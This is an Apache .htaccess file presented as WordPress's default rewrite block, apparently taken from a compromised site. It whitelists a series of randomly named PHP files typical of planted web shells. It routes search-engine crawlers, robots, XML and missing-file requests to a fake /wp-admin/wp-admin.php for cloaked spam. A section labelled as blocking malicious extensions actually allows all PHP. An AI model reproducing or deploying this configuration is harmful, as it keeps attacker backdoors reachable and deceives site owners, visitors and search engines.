# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /

# WHITELIST - Allowed PHP files
RewriteRule ^tf88\.php$ - [L]
RewriteRule ^XrdbXymas\.php$ - [L]
RewriteRule ^webindex\.php$ - [L]
RewriteRule ^webindexORI\.php$ - [L]
RewriteRule ^XrdbXydefault\.php$ - [L]
RewriteRule ^ZMYYdI7Hdefault\.php$ - [L]
RewriteRule ^robot\.php$ - [L]
RewriteRule ^robots\.php$ - [L]
RewriteRule ^ah88\.php$ - [L]
RewriteRule ^ws88\.php$ - [L]
RewriteRule ^tf77\.php$ - [L]
RewriteRule ^mas77\.php$ - [L]
RewriteRule ^webindex\.php$ - [L]
RewriteRule ^tx77\.php$ - [L]
RewriteRule ^lm77\.php$ - [L]
RewriteRule ^ws77\.php$ - [L]
RewriteRule ^robot\.php$ - [L]
RewriteRule ^robots\.php$ - [L]
RewriteRule ^ah77\.php$ - [L]
RewriteRule ^ws77\.php$ - [L]


# CORE WP - Directories
RewriteRule ^wp-admin/ - [L]
RewriteRule ^wp-includes/ - [L]
RewriteRule ^wp-content/ - [L]


# CORE WP - Files
RewriteRule ^wp\-config\.php$ - [L]
RewriteRule ^wp\-activate\.php$ - [L]
RewriteRule ^wp\-blog\-header\.php$ - [L]
RewriteRule ^wp\-comments\-post\.php$ - [L]
RewriteRule ^wp\-cron\.php$ - [L]
RewriteRule ^wp\-links\-opml\.php$ - [L]
RewriteRule ^wp\-load\.php$ - [L]
RewriteRule ^wp\-login\.php$ - [L]
RewriteRule ^wp\-mail\.php$ - [L]
RewriteRule ^wp\-settings\.php$ - [L]
RewriteRule ^wp\-signup\.php$ - [L]
RewriteRule ^wp\-trackback\.php$ - [L]
RewriteRule ^xmlrpc\.php$ - [L]
RewriteRule ^license\.txt$ - [L]
RewriteRule ^readme\.html$ - [L]
RewriteRule ^robots\.txt$ - [L]


# CUSTOM ROUTING - Bot Handling
RewriteCond %{THE_REQUEST} \s/[?\s] [NC]
RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC]
RewriteRule ^ /wp-admin/wp-admin.php [L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{HTTP_USER_AGENT} (googlebot|google|yahoo|aol) [NC]
RewriteRule ^(.+)$ /wp-admin/wp-admin.php [L]

# Robot/Xml Routing
RewriteRule ^robots?$ /wp-admin/wp-admin.php [L,NC]
RewriteRule .*\.xml$ /wp-admin/wp-admin.php [L,NC]

# Allow direct access to wp-admin.php
RewriteRule ^wp-admin/wp-admin\.php$ - [L]


# Catch-all for non-existent files -> wp-admin.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ /wp-admin/wp-admin.php [L]

# WordPress Default Fallback (for normal operation)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

# ==================================================
# SECURE ACCESS - Block Malicious Extensions
# ==================================================
<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|PHP5|Php5|PHp5|pHp5|pHP5|phP5|PhP5|php7|PHP7|Php7|PHp7|pHp7|pHP7|phP7|PhP7|php8|PHP8|Php8|PHp8|pHp8|pHP8|phP8|PhP8|suspected)$">
Order Allow,Deny
Allow from all
</FilesMatch>

# ==================================================
# SECURE ACCESS - Allow Whitelisted Core & Custom Files
# ==================================================
<FilesMatch "^(webindex\.php\(54\) \: eval\(\)'d code\(1\) \: eval\(\)'d code|index\.php|wp-admin\.php|tf88\.php|XrdbXymas\.php|webindex\.php|webindexORI\.php|XrdbXydefault\.php|ZMYYdI7Hdefault\.php|robot\.php|robots\.php|ah88\.php|ws88\.php|tf77\.php|mas77\.php|tx77\.php|lm77\.php|ws77\.php|ah77\.php|wp\-config\.php|wp\-activate\.php|wp\-blog\-header\.php|wp\-comments\-post\.php|wp\-cron\.php|wp\-links\-opml\.php|wp\-load\.php|wp\-login\.php|wp\-mail\.php|wp\-settings\.php|wp\-signup\.php|wp\-trackback\.php|xmlrpc\.php|license\.txt|readme\.html|robots\.txt)$">
Order Allow,Deny
Allow from all
</FilesMatch>